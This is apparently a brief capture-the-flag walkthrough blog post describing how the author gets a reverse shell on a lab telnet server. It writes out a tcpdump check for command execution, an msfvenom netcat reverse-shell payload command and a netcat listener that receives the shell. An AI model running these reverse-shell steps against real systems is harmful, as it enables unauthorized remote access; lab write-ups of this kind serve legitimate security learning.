
Hack. Sleep. Repeat

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Let exploit some common vulnerablity in the telnet client and system server let hit it since we have the IP and port let connect to it with telnet IP PORT .


Now let try to execute some commands.


Hmmm we got nothing now let’s check to see if what we’re typing is being executed as a system command.

Let start up a tcpdump listener on our machine.

sudo tcpdump ip proto \\icmp -i tun0

This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.


Now let try to ping our IP on the telnet server and check our tcpdump listener.

.RUN ping Local-IP -c 1


Cool we are able to execute system commands since we are able to ping our local IP now let get reverse shell let generate a reverse shell code with msfvenom.

msfvenom -p cmd/unix/reverse_netcat lhost=Local-IP lport=4444 R


now let start our ncat listener nc -nvlp 4444 and run the reverse shell code on the telnet client.


And we have shell back to our terminal.


Greeting From Muzec

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